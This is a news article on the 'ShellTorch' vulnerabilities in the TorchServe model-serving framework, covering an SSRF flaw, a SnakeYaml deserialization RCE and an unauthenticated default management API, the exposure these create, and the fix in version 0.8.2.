Critical 'ShellTorch' Flaws Light Up Open Source AI Users, Like Google

The vulnerabilities exist in the widely used TorchServe framework, used by Amazon, Google, Walmart, and many other heavy hitters.

4 Min Read
Burning, flaming torch
Source: jokerpro via Alamy Stock Photo

A newly discovered set of critical vulnerabilities in a machine learning framework known as TorchServe could allow cyberattackers a way to completely subvert artificial intelligence (AI) models for a range of bad outcomes. The bugs show that AI applications are equally as susceptible to open source bugs as any other application, researchers noted. The bugs affect Amazon and Google's machine learning services, among many others.

TorchServe is an open source framework maintained by Amazon and Meta, used for deploying deep-learning models based on the PyTorch open source machine learning library into production environments. It's used by many large companies; commercial users of TorchServe include Walmart, Amazon, Microsoft Azure, Google Cloud, and others.

Successful exploitation of the vulnerabilities could let threat actors access proprietary data in AI models, to insert malicious models into production environments, alter a machine learning model's results, and take complete control over servers.

Thousands of Targets: Bugs See Wide Exposure

Thousands of vulnerable instances of the software are publicly exposed on the Internet and open to unauthorized access and a range of other malicious actions, according to researchers at Oligo who discovered the vulnerabilities.

"TorchServe is among the most popular model-serving frameworks for PyTorch," Oligo researchers Idan Levcovich, Guy Kaplan, and Gal Elbaz wrote in a blog post this week. "Using a simple IP scanner, we were able to find tens of thousands of IP addresses that are currently completely exposed to the attack — including many belonging to Fortune 500 organizations."

All versions of TorchServe from 0.8.1 and earlier are vulnerable. Oligo reported the vulnerabilities to PyTorch, which addressed the flaws in TorchServe version 0.8.2. "The update from Oct. 3 dramatically reduced the exposure, and therefore we recommend all users upgrade to the latest version," says Elbaz, co-founder and CTO at Oligo.

The ShellTorch Flaws

Oligo has collectively dubbed the vulnerabilities as "ShellTorch." Two of them are rated as critical with a near-maximum severity rating on the CVSS scale: CVE-2023-43654, a server-side request forgery (SSRF) vulnerability that enables remote code execution (RCE); and CVE-2022-1471, a Java deserialization RCE.

The third ShellTorch vulnerability stems from how TorchServe by default exposes a critical management API to the Internet. Though changing the configuration from default mitigates the issue, many organizations and projects based on TorchServe have used the default configuration.

"As a result, the vulnerability is also present in Amazon’s and Google’s proprietary Docker images by default, and are present in self-managed services of the largest providers of machine learning services," according to Oligo. "This includes self-managed Amazon AWS SageMaker, self-managed Google Vertex AT, and several other projects built on TorchServe. The misconfiguration is particularly problematic because accessing the management interface requires no authentication at all, so anyone can access it."

"Correctly configuring the management interface does close the major attack vector, but ShellTorch can be exploited via additional vectors," Elbaz says.

Server-Side Request Forgery Flaw

One of these vectors has to do with CVE-2023-43564, the SSRF flaw that the company discovered. The flaw is tied to a TorchServe API for fetching a machine learning model's configuration files. Oligo found that while the API contained logic for fetching configuration files from only an allowed list of URLs, by default it accepted any and all domains as valid URLs. An attacker could use the flaw to upload a malicious model into a production environment resulting in arbitrary code execution. When combined with the default configuration error, CVE-2023-43564 allows an unauthenticated attacker to execute arbitrary code in PyTorch environments, Oligo found.

CVE-2022-1471 is am RCE vulnerability in SnakeYaml, a widely used open source library that TorchServe implements. Oligo researchers found that by uploading an ML model with a malicious YAML file, they could trigger an attack that resulted in RCE on the underlying server.

The vulnerabilities show that AI applications are exposed to the same risks that all applications are exposed to from open source code, Elbaz says. But with AI, the consequences are even greater given the myriad use cases for large language models and other AI technologies. Vulnerabilities such as ShellTorch give attackers a way to corrupt AI models in order to generate misleading answers and create other havoc. 

"AI is a giant step forward for technology, and with these benefits come new risks — huge potential with huge risks," Elbaz says. "There are new types of risks that we have never really seen before, so we need to be ready to evolve in order to protect AI infrastructure."

About the Author(s)

Jai Vijayan, Contributing Writer

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Keep up with the latest cybersecurity threats, newly discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

You May Also Like


More Insights